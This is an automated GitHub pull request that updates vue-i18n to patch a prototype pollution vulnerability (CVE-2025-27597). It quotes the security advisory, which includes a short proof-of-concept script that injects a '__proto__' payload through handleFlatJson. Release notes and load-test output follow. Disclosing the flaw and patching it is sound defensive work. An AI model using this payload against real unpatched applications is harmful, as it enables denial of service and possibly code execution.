Update dependency vue-i18n to v11.1.2 [SECURITY]

[openverse-bot]

This PR contains the following updates:

Package	Type	Update	Change
vue-i18n (source)	devDependencies	minor	11.0.1 -> 11.1.2

GitHub Vulnerability Alerts

CVE-2025-27597

Vulnerability type:
Prototype Pollution

Vulnerability Location(s):

# v9.1
node_modules/@​intlify/message-resolver/index.js

# v9.2 or later
node_modules/@​intlify/vue-i18n-core/index.js

Description:

The latest version of @intlify/message-resolver (9.1) and @intlify/vue-i18n-core (9.2 or later), (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) handleFlatJson. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.

Moreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.

PoC:

// install the package with the latest version
~$ npm install @​intlify/[email protected]
// run the script mentioned below 
~$ node poc.js
//The expected output (if the code still vulnerable) is below. 
// Note that the output may slightly differs from function to another.
Before Attack:  {}
After Attack:  {"pollutedKey":123}

// poc.js
(async () => {
    const lib = await import('@​intlify/message-resolver');
    var someObj = {}
    console.log("Before Attack: ", JSON.stringify({}.__proto__));
    try {
        // for multiple functions, uncomment only one for each execution.
        lib.handleFlatJson ({ "__proto__.pollutedKey": "pollutedValue" })
    } catch (e) { }
    console.log("After Attack: ", JSON.stringify({}.__proto__));
    delete Object.prototype.pollutedKey;
})();

---

Release Notes

intlify/vue-i18n (vue-i18n)

v11.1.2

Compare Source

What's Changed

🔒 Security Fixes

• fix: prototype pollution in handleFlatJson, about details see GHSA-p2ph-7g93-hw3m

Full Changelog: intlify/vue-i18n@v11.1.1...v11.1.2

v11.1.1

Compare Source

Full Changelog: intlify/vue-i18n@v11.1.0...v11.1.1

v11.1.0

Compare Source

What's Changed

🌟 Features

• feat: configurable ComponentCustomProperties['$i18n'] type by @​BobbieGoede in https://github.com/intlify/vue-i18n/pull/2094

📝️ Documentations

• fix: vue-i18n v8 EOL by @​kazupon in https://github.com/intlify/vue-i18n/pull/2060

Full Changelog: intlify/vue-i18n@v11.0.1...v11.1.0

---

Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[github-actions]

Latest k6 run output¹

     ✓ status was 200

     checks.........................: 100.00% ✓ 416      ✗ 0   
     data_received..................: 96 MB   397 kB/s
     data_sent......................: 55 kB   226 B/s
     http_req_blocked...............: avg=53.73µs  min=2.29µs   med=5µs      max=1.09ms   p(90)=141.79µs p(95)=226.31µs
     http_req_connecting............: avg=39.31µs  min=0s       med=0s       max=1.04ms   p(90)=97.76µs  p(95)=162.91µs
     http_req_duration..............: avg=164.42ms min=19.56ms  med=100.53ms max=1.1s     p(90)=392.89ms p(95)=500.57ms
       { expected_response:true }...: avg=164.42ms min=19.56ms  med=100.53ms max=1.1s     p(90)=392.89ms p(95)=500.57ms
   ✓ http_req_failed................: 0.00%   ✓ 0        ✗ 416 
     http_req_receiving.............: avg=173.39µs min=50.83µs  med=142.28µs max=2.76ms   p(90)=271.04µs p(95)=328.47µs
     http_req_sending...............: avg=26.68µs  min=7.47µs   med=22.9µs   max=129.76µs p(90)=35.41µs  p(95)=51.21µs 
     http_req_tls_handshaking.......: avg=0s       min=0s       med=0s       max=0s       p(90)=0s       p(95)=0s      
     http_req_waiting...............: avg=164.22ms min=19.44ms  med=100.39ms max=1.1s     p(90)=392.64ms p(95)=500.26ms
     http_reqs......................: 416     1.725399/s
     iteration_duration.............: avg=884.13ms min=217.92ms med=902.26ms max=1.85s    p(90)=1.2s     p(95)=1.59s   
     iterations.....................: 78      0.323512/s
     vus............................: 3       min=0      max=6 
     vus_max........................: 60      min=60     max=60

Footnotes

1. This comment will automatically update with new output each time k6 runs for this PR ↩